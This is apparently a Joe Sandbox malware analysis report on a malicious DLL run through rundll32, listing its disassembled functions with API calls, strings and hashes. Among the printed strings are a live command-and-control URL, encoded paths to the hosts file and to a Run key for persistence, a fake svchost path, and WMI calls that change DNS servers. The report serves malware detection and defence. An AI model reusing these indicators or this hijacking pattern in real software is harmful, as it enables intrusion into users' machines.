
                                                                                                                                      Function 100053B7 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 229sleepfileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • wsprintfA.USER32 ref: 10005437
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?,10016AD0), ref: 1000537D
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?, ,?,10016AD0), ref: 1000538A
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?,00000000,?, ,?,10016AD0), ref: 10005393
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?,1001538C,?,00000000,?, ,?,10016AD0), ref: 100053A0
                                                                                                                                      • wsprintfA.USER32 ref: 1000549E
                                                                                                                                      • wsprintfA.USER32 ref: 100054BC
                                                                                                                                      • PrintFile.4HSURTWNWJ(?,?,75A38400,?,00000000), ref: 100054DE
                                                                                                                                      • rand.MSVCRT ref: 1000552A
                                                                                                                                      • rand.MSVCRT ref: 10005538
                                                                                                                                      • rand.MSVCRT ref: 10005543
                                                                                                                                      • rand.MSVCRT ref: 1000554E
                                                                                                                                      • rand.MSVCRT ref: 10005559
                                                                                                                                      • rand.MSVCRT ref: 10005564
                                                                                                                                      • wsprintfA.USER32 ref: 10005582
                                                                                                                                      • Sleep.KERNEL32(000003E8,00000000,?,?,40000000,00000001,00000000,00000002,00000000,00000000,?,?,?,00000009,00000000,75A38400), ref: 100055AE
                                                                                                                                      Strings
                                                                                                                                      • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054A9
                                                                                                                                      • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 1000556F
                                                                                                                                      • %s\%s, xrefs: 10005431
                                                                                                                                      • c:\windows\system32\drivers\%s, xrefs: 10005498
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: rand$InitializeThunkwsprintf$FilePrintSleep
                                                                                                                                      • String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
                                                                                                                                      • API String ID: 3997227624-455112146
                                                                                                                                      • Opcode ID: 00038874c8ac35a6ae1b60bac382e6ffef2455f26ac0b5aee4ca5ce9a6c88aa6
                                                                                                                                      • Instruction ID: 890992f53ccb8bcf3efa63f38db088aa64bba12002f314d7c4cebe62ca78ea42
                                                                                                                                      • Opcode Fuzzy Hash: 00038874c8ac35a6ae1b60bac382e6ffef2455f26ac0b5aee4ca5ce9a6c88aa6
                                                                                                                                      • Instruction Fuzzy Hash: CA611773A00258BFEB14DB64CC46FDE77ADEB84351F184466F6089B180DBB5FA848B60
                                                                                                                                      Function 1000720E Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 366COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 10007338
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 1000734D
                                                                                                                                      • SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 10007368
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10007377
                                                                                                                                        • Part of subcall function 10007A62: VariantInit.OLEAUT32(?), ref: 10007AA1
                                                                                                                                      • SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007505
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10007513
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitVariant$ArrayCreateSafe
                                                                                                                                      • String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=
                                                                                                                                      • API String ID: 2640012081-1668994663
                                                                                                                                      • Opcode ID: 86e639d1799cf5c67544a657d22f8ae4b178d9a2e4eb471cf584f507669dd23e
                                                                                                                                      • Instruction ID: 774f900a019f83844f3bb95aad3f9d8ec9bae888818d20f4d4ee3eb9d32bfb7b
                                                                                                                                      • Opcode Fuzzy Hash: 86e639d1799cf5c67544a657d22f8ae4b178d9a2e4eb471cf584f507669dd23e
                                                                                                                                      • Instruction Fuzzy Hash: 52D18F70D00219EFEB15CFA4C8809EEBBB8FF49780F104419F419AB255DB75AA45CFA1
                                                                                                                                      Function 10006EDE Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 174sleeplibraryfileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 10006F24
                                                                                                                                      • LdrInitializeThunk.NTDLL(00000000,00000000,XGRyaXZlcnNcZXRjXGhvc3Rz), ref: 10006F8B
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,00000000,XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==,00000000,00000000,XGRyaXZlcnNcZXRjXGhvc3Rz), ref: 10006FA2
                                                                                                                                      • Sleep.KERNEL32 ref: 10007059
                                                                                                                                      • wsprintfA.USER32 ref: 1000709D
                                                                                                                                      • PrintFile.4HSURTWNWJ(00000000,?,00000000), ref: 100070D6
                                                                                                                                      • PrintFile.4HSURTWNWJ(00000000,?,00000000,?,00000000), ref: 100070E9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileInitializePrintSleepThunk$wsprintf
                                                                                                                                      • String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.236:18963/main.php$iOffset
                                                                                                                                      • API String ID: 983772623-225904188
                                                                                                                                      • Opcode ID: cc88521ed6d5d260813b9f4f205076b0dda962502f18a0edca253145bac44edc
                                                                                                                                      • Instruction ID: 7c4733b2b25a4913de381e4f7388076186c29a0bebbbdc1df1b0301bf662e4ca
                                                                                                                                      • Opcode Fuzzy Hash: cc88521ed6d5d260813b9f4f205076b0dda962502f18a0edca253145bac44edc
                                                                                                                                      • Instruction Fuzzy Hash: 6151D9B6D04359A6F722D764CC56FCF77ACEB083C1F1045A5F208E6086DB79AB808E55
                                                                                                                                      Function 10004D36 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 302COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10004EC5
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10004ECB
                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 10004ED1
                                                                                                                                      • VariantInit.OLEAUT32(?,?,?,?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 10005009
                                                                                                                                      • VariantInit.OLEAUT32(?,?,?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000500F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitVariant
                                                                                                                                      • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
                                                                                                                                      • API String ID: 1927566239-2685825574
                                                                                                                                      • Opcode ID: 755400ef9f5a302fc9c7fa6a74ec9a7d080b6a6ee052c7b36293419411c16ba5
                                                                                                                                      • Instruction ID: 8c544d8820f47f8c2d588d66ad59eabb0b2f9e9606fb3a9374643a4bafb8e659
                                                                                                                                      • Opcode Fuzzy Hash: 755400ef9f5a302fc9c7fa6a74ec9a7d080b6a6ee052c7b36293419411c16ba5
                                                                                                                                      • Instruction Fuzzy Hash: DFA17EB1900209AFEB04DFA4CC81DEEBBB8FF48390F104569F515AB284DB31AE45CB60
                                                                                                                                      Function 1000826C Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 145librarysleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(00000000,00000000,XGRyaXZlcnNcZXRjXGhvc3Rz), ref: 100082D7
                                                                                                                                      • LdrInitializeThunk.NTDLL(00000000,00000000,XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==,00000000,00000000,XGRyaXZlcnNcZXRjXGhvc3Rz), ref: 100082EE
                                                                                                                                      • Sleep.KERNEL32(?,00000000,00000000), ref: 10008394
                                                                                                                                      • wsprintfA.USER32 ref: 100083E6
                                                                                                                                      Strings
                                                                                                                                      • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082DC
                                                                                                                                      • 127.0.0.1, xrefs: 100083F4
                                                                                                                                      • 8.8.8.8, xrefs: 100083EF
                                                                                                                                      • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082C5
                                                                                                                                      • http://107.163.56.236:18963/main.php, xrefs: 10008353
                                                                                                                                      • Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008405
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk$Sleepwsprintf
                                                                                                                                      • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.236:18963/main.php
                                                                                                                                      • API String ID: 2795264321-3398374254
                                                                                                                                      • Opcode ID: aa513003387c355abc963e83af9959fb4ce06968deafc37a589a73ab8a51a600
                                                                                                                                      • Instruction ID: 599745a503878d8c2b4f4c943fee7f854f2ac9340d99916b44456f1581be1535
                                                                                                                                      • Opcode Fuzzy Hash: aa513003387c355abc963e83af9959fb4ce06968deafc37a589a73ab8a51a600
                                                                                                                                      • Instruction Fuzzy Hash: E141F6B6904358B6FB21D364CC46FCF77ACEB457C0F2400A5F248A9086DAB4AB844E51
                                                                                                                                      Function 1000570F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 103filethreadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • wsprintfA.USER32 ref: 1000574F
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?,10016AD0), ref: 1000537D
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?, ,?,10016AD0), ref: 1000538A
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?,00000000,?, ,?,10016AD0), ref: 10005393
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?,1001538C,?,00000000,?, ,?,10016AD0), ref: 100053A0
                                                                                                                                      • wsprintfA.USER32 ref: 100057B1
                                                                                                                                      • wsprintfA.USER32 ref: 100057C5
                                                                                                                                      • PrintFile.4HSURTWNWJ(?,?,?,?,00000000), ref: 100057E8
                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005620,00000000,00000000,00000000), ref: 10005835
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk$wsprintf$CreateFilePrintThread
                                                                                                                                      • String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
                                                                                                                                      • API String ID: 2056782399-1421401311
                                                                                                                                      • Opcode ID: 999454b76a3871e070a6a5ffc189addd559c3746fb8db70fc033f3fdbaaeec8c
                                                                                                                                      • Instruction ID: 3475601ff51186fd0577e9aefcd7f13683c9e8deab9ec6392723b4efb7ee459d
                                                                                                                                      • Opcode Fuzzy Hash: 999454b76a3871e070a6a5ffc189addd559c3746fb8db70fc033f3fdbaaeec8c
                                                                                                                                      • Instruction Fuzzy Hash: E531A772910238BBEB21D7A4CC45FCF7B6CEB08356F0404A6F708FA051DB71AAC58A95
                                                                                                                                      Function 10006499 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 271timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • wsprintfA.USER32 ref: 100064F7
                                                                                                                                        • Part of subcall function 10003F0A: InternetOpenA.WININET(?,?,?,?,?), ref: 10003F1C
                                                                                                                                      • ___crtGetTimeFormatEx.LIBCMT ref: 10006546
                                                                                                                                        • Part of subcall function 10003F24: InternetOpenUrlA.WININET(?,?,?,?,?,?), ref: 10003F39
                                                                                                                                        • Part of subcall function 10003F41: InternetReadFile.WININET(?,?,?,?), ref: 10003F51
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF), ref: 100065C8
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00000000,?,?,?,?,000000FF), ref: 100065E6
                                                                                                                                      • wsprintfA.USER32 ref: 100066E9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Internet$ByteCharMultiOpenWidewsprintf$FileFormatReadTime___crt
                                                                                                                                      • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==$title
                                                                                                                                      • API String ID: 4077377486-2496724313
                                                                                                                                      • Opcode ID: 83aa3aa6bf516d6c3505b0f026932e1ea81e6e4526a9e20d3e14812d000b8952
                                                                                                                                      • Instruction ID: 044586ec3c66e1b491d8aef48fe61f5f32d537583c3337ebc29691013f4a6a04
                                                                                                                                      • Opcode Fuzzy Hash: 83aa3aa6bf516d6c3505b0f026932e1ea81e6e4526a9e20d3e14812d000b8952
                                                                                                                                      • Instruction Fuzzy Hash: 8A81D4B980124CBEFB01DBA4DC81EFF7B7EEF09394F244069F504A6186DA356E4187A1
                                                                                                                                      Function 1000600F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 97libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,10015560), ref: 100060BB
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,?,?,10015560), ref: 100060CE
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,10015560,?,?,?,10015560), ref: 100060DB
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$urlmon.dll$wininet.dll
                                                                                                                                      • API String ID: 2994545307-1569318151
                                                                                                                                      • Opcode ID: 5adf153cc9580fb278344c39589a6ba9b71a499fa2f994386b1a3d3fccec60b6
                                                                                                                                      • Instruction ID: 89362ecd2e020830cb73e300e147660b047a90e03c50ce999b2b664bc423d859
                                                                                                                                      • Opcode Fuzzy Hash: 5adf153cc9580fb278344c39589a6ba9b71a499fa2f994386b1a3d3fccec60b6
                                                                                                                                      • Instruction Fuzzy Hash: BA317FB6D0065CBAEB11DBA4CC45FDF7F7DEB08341F4404A6F208AA181E731AA458E60
                                                                                                                                      Function 10005DB4 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 109timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ___crtGetTimeFormatEx.LIBCMT ref: 10005E11
                                                                                                                                        • Part of subcall function 1000409D: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040B2
                                                                                                                                        • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10005E1E,?,?,ProcessorNameString,00000000,00000004,?,?,80000002,?,00000000,000F003F,?), ref: 10004096
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseFormatQueryTimeValue___crt
                                                                                                                                      • String ID: %u MB$11301248$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.236:18963/main.php
                                                                                                                                      • API String ID: 271660946-3098610844
                                                                                                                                      • Opcode ID: 89ef436d12fc4dc7334d8d0032665fcea276c3ced92210afa0b41b76ea0b6097
                                                                                                                                      • Instruction ID: abc6f20b1ce2cb917ff0de70ec6e798626a5ef384760a4d5e12c6da5aced1c49
                                                                                                                                      • Opcode Fuzzy Hash: 89ef436d12fc4dc7334d8d0032665fcea276c3ced92210afa0b41b76ea0b6097
                                                                                                                                      • Instruction Fuzzy Hash: 7431B27680421CBAFB21C764DC42FDF77BCEB08350F14406AF658BA182DB75BA458B55
                                                                                                                                      Function 1000436F Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 72sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844621861.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844653840.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844677829.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep$wsprintf
                                                                                                                                      • String ID: %s.%d$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==$self
                                                                                                                                      • API String ID: 3195947292-4033731652
                                                                                                                                      • Opcode ID: 9b701531f22789b5dad6288f69fc764c12d1df05a5603929814c97d9c4d790f8
                                                                                                                                      • Instruction ID: 4c3d49f5aa9e73cfdb38f6eb8da828af3488b33cf980db7ddda8d91dcb2ab0ee
                                                                                                                                      • Opcode Fuzzy Hash: 9b701531f22789b5dad6288f69fc764c12d1df05a5603929814c97d9c4d790f8
                                                                                                                                      • Instruction Fuzzy Hash: FB1104B6410254BAFB11FB24DC82BDE3759EF043D6F114015F6486D095CFB6EA808A28
                                                                                                                                      Function 10006CF7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
                                                                                                                                        • Part of subcall function 1000406C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 1000408A
                                                                                                                                      • wsprintfA.USER32 ref: 10006D88
                                                                                                                                      • ___crtGetTimeFormatEx.LIBCMT ref: 10006DAE
                                                                                                                                        • Part of subcall function 100040D4: RegSetValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040E9
                                                                                                                                        • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10005E1E,?,?,ProcessorNameString,00000000,00000004,?,?,80000002,?,00000000,000F003F,?), ref: 10004096
                                                                                                                                      Strings
                                                                                                                                      • REG_SZ, xrefs: 10006D44
                                                                                                                                      • wfl, xrefs: 10006DA6
                                                                                                                                      • %s "%s",WriteErrorLog, xrefs: 10006D82
                                                                                                                                      • U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10006D4A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.1844560078.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000E.00000002.1844541183.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844580489.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
